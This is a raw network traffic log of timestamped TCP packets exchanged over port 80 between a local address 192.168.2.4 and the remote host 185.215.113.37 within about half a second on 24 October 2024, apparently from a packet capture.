Oct 24, 2024 19:29:18.490118027 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.490122080 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.490127087 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.490133047 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.490144014 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.490154982 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.490160942 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.490165949 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.490180969 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.490199089 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.490209103 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.490238905 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.490353107 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.490367889 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.490377903 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.490406990 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.490432978 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.536039114 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.536062956 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.536081076 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.536098003 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.536119938 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.536156893 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.536578894 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.536636114 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.607310057 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.607352018 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.607367992 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.607372046 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.607383966 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.607400894 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.607403994 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.607403994 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.607415915 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.607419968 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.607433081 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.607446909 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.607489109 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.607489109 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.607526064 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.607539892 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.607554913 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.607568026 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.607568979 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.607585907 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.607599974 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.607603073 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.607621908 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.607630968 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.607639074 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.607654095 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.607675076 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.607903004 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.607922077 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.607939005 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.607950926 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.607954025 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.607961893 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.607970953 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.607983112 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.607986927 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.607996941 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.608004093 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.608020067 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.608023882 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.608036041 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.608046055 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.608051062 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.608068943 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.608083010 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.608093023 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.608093023 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.608098984 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.608127117 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.608139992 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.608180046 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.608195066 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.608211040 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.608226061 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.608241081 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.608263016 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.608321905 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.608336926 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.608354092 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.608378887 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.608407021 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.608453989 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.608681917 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.608700037 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.608707905 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.608715057 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.608726978 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.608731031 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.608741999 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.608748913 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.608760118 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.608764887 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.608778954 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.608781099 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.608789921 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.608797073 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.608808041 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.608812094 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.608822107 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.608829021 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.608839989 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.608844042 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.608854055 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.608867884 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.608871937 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.608884096 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.608884096 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.608901978 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.608911991 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.608917952 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.608927011 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.608935118 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.608949900 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.608954906 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.608962059 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.608973026 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.608993053 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.608993053 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.609009027 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.609170914 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.609185934 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.609200954 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.609215975 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.609225988 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.609231949 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.609246969 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.609261036 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.609261990 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.609276056 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.609277010 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.609306097 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.609321117 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.609335899 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.609350920 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.609364986 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.609384060 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.609399080 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.609414101 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.609436035 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.609451056 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.609464884 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.609478951 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.609494925 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.609508038 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.609523058 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.609538078 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.609553099 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.609569073 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.609584093 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.609601021 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.609679937 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.609679937 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.609679937 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.609679937 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.609679937 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.609679937 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.609679937 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.609679937 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.609731913 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.609733105 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.609733105 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.609733105 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.609733105 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.609733105 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.609733105 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.609971046 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.610001087 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.610016108 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.610019922 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.610030890 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.610033035 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.610048056 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.610054970 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.610064983 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.610069990 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.610080957 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.610085964 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.610097885 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.610100985 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.610121965 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.610131979 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.610256910 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.610271931 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.610285044 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.610296965 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.610301018 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.610308886 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.610318899 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.610330105 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.610341072 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.610362053 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.610426903 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.610441923 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.610455990 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.610465050 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.610471964 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.610476017 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.610488892 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.610496998 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.610506058 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.610506058 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.610522032 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.610527039 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.610537052 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.610537052 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.610553026 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.610555887 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.610569000 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.610577106 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.610584974 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.610585928 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.610600948 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.610605955 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.610616922 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.610626936 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.610632896 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.610640049 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.610651970 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.610656023 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.610672951 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.610685110 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.653548956 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.653573036 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.653590918 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.653604984 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.653639078 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.960329056 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.960350037 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.960366964 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.960393906 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.960422993 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.960473061 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.960489988 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.960505009 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.960520029 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.960521936 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.960534096 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.960539103 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.960567951 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.960568905 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.960585117 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.960591078 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.960602045 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.960614920 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.960618019 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.960628986 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.960635900 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.960648060 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.960668087 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.960669041 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.960679054 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.960685015 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.960700989 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.960711956 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.960730076 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.960752010 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.960834980 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.960850000 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.960864067 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.960880041 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.960891008 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.960896015 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.960910082 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.960912943 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.960927010 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.960942984 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.960943937 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.960951090 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.960959911 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.960974932 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.960983992 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.960992098 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.961009026 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.961009979 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.961029053 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.961051941 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.961273909 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.961288929 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.961302042 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.961311102 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.961318016 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.961328983 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.961333990 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.961340904 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.961350918 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.961360931 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.961366892 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.961373091 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.961381912 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.961391926 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.961401939 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.961405039 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.961420059 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.961421013 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.961436033 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.961446047 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.961452007 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.961460114 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.961469889 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.961476088 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.961492062 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.961498022 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.961508036 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.961510897 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.961525917 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.961539030 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.961540937 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.961559057 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.961569071 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.961580038 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.961611986 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.961613894 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.961630106 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.961644888 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.961653948 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.961659908 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.961663008 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.961678982 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.961683035 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.961694002 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.961716890 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.961757898 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.961771965 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.961786985 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.961802006 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.961812973 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.961841106 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.961863995 CEST	49730	80	192.168.2.4	185.215.113.37
